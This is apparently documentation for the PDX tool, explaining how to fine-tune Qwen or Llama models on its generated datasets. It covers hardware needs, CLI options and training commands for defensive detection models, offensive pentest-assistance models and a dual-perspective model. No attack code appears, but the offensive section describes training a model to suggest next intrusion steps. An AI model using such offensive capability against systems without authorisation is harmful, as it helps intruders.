Fine-tuning¶

PDX generates training datasets that can be used to fine-tune LLMs for cybersecurity tasks — both defensive (detection, alerting) and offensive (pentest assistance, TTP reconstruction).

Requirements¶

Resource	Minimum	Recommended
GPU VRAM	8 GB	16 GB+
RAM	16 GB	32 GB
Disk	20 GB	50 GB
Framework	Unsloth	Unsloth

Supported base models¶

Model	Size	Best for
Qwen 2.5	7B / 14B	Fast iteration, good multilingual
Llama 3.3	8B / 70B	English-focused, strong reasoning

Quick fine-tune¶

python training/finetune_pdx.py \
  --dataset training_output/data_router/defensive/sft_detection_patterns.jsonl \
  --model qwen \
  --epochs 3 \
  --rank 16

Options¶

Flag	Default	Description
`--dataset`	—	Path to JSONL training data
`--model`	`qwen`	Base model (`qwen` or `llama`)
`--epochs`	3	Training epochs
`--rank`	16	LoRA rank (higher = more capacity, more VRAM)
`--resume`	false	Resume from checkpoint

Training a defensive model¶

# Generate defensive datasets first
python -m pdx.training.data_router generate --defensive

# Train on detection patterns
python training/finetune_pdx.py \
  --dataset training_output/data_router/defensive/sft_detection_patterns.jsonl \
  --model qwen --epochs 5 --rank 16

# Train on lure effectiveness (DPO)
python training/finetune_pdx.py \
  --dataset training_output/data_router/defensive/dpo_lure_quality.jsonl \
  --model qwen --epochs 3 --rank 16

After training, the model can:

Identify MITRE ATT&CK tactics from SSH command sequences
Score the threat level of observed commands
Evaluate which persona configurations are most effective

Training an offensive model¶

# Generate offensive datasets first
python -m pdx.training.data_router generate --offensive

# Train on attack chains
python training/finetune_pdx.py \
  --dataset training_output/data_router/offensive/sft_attack_chains.jsonl \
  --model llama --epochs 5 --rank 32

# Train on kill chains (RAFT)
python training/finetune_pdx.py \
  --dataset training_output/data_router/offensive/raft_kill_chains.jsonl \
  --model llama --epochs 3 --rank 32

After training, the model can:

Reconstruct post-exploitation sequences from partial observations
Suggest next steps in a pentest based on current position
Map observed commands to MITRE ATT&CK techniques

Training a dual-perspective model¶

# Generate combined datasets
python -m pdx.training.data_router generate --combined

# Train on dual-perspective analysis
python training/finetune_pdx.py \
  --dataset training_output/data_router/combined/react_dual_perspective.jsonl \
  --model qwen --epochs 5 --rank 32

This produces a model that can analyze the same command sequence from both offensive and defensive perspectives — the most unique output of the PDX pipeline.

VRAM management¶

The fine-tuning script includes automatic VRAM safety checks:

[VRAM] Total: 15.8 GB | Used: 2.1 GB | Free: 13.7 GB
[VRAM] Estimated requirement for Qwen-7B + LoRA rank 16: ~6 GB
[VRAM] Status: OK — proceeding

If Ollama is running, the script will warn you — Ollama and fine-tuning compete for VRAM.

For limited VRAM (8GB)

Use --rank 8 and --model qwen (7B). This fits in 6GB VRAM with room for the training batch.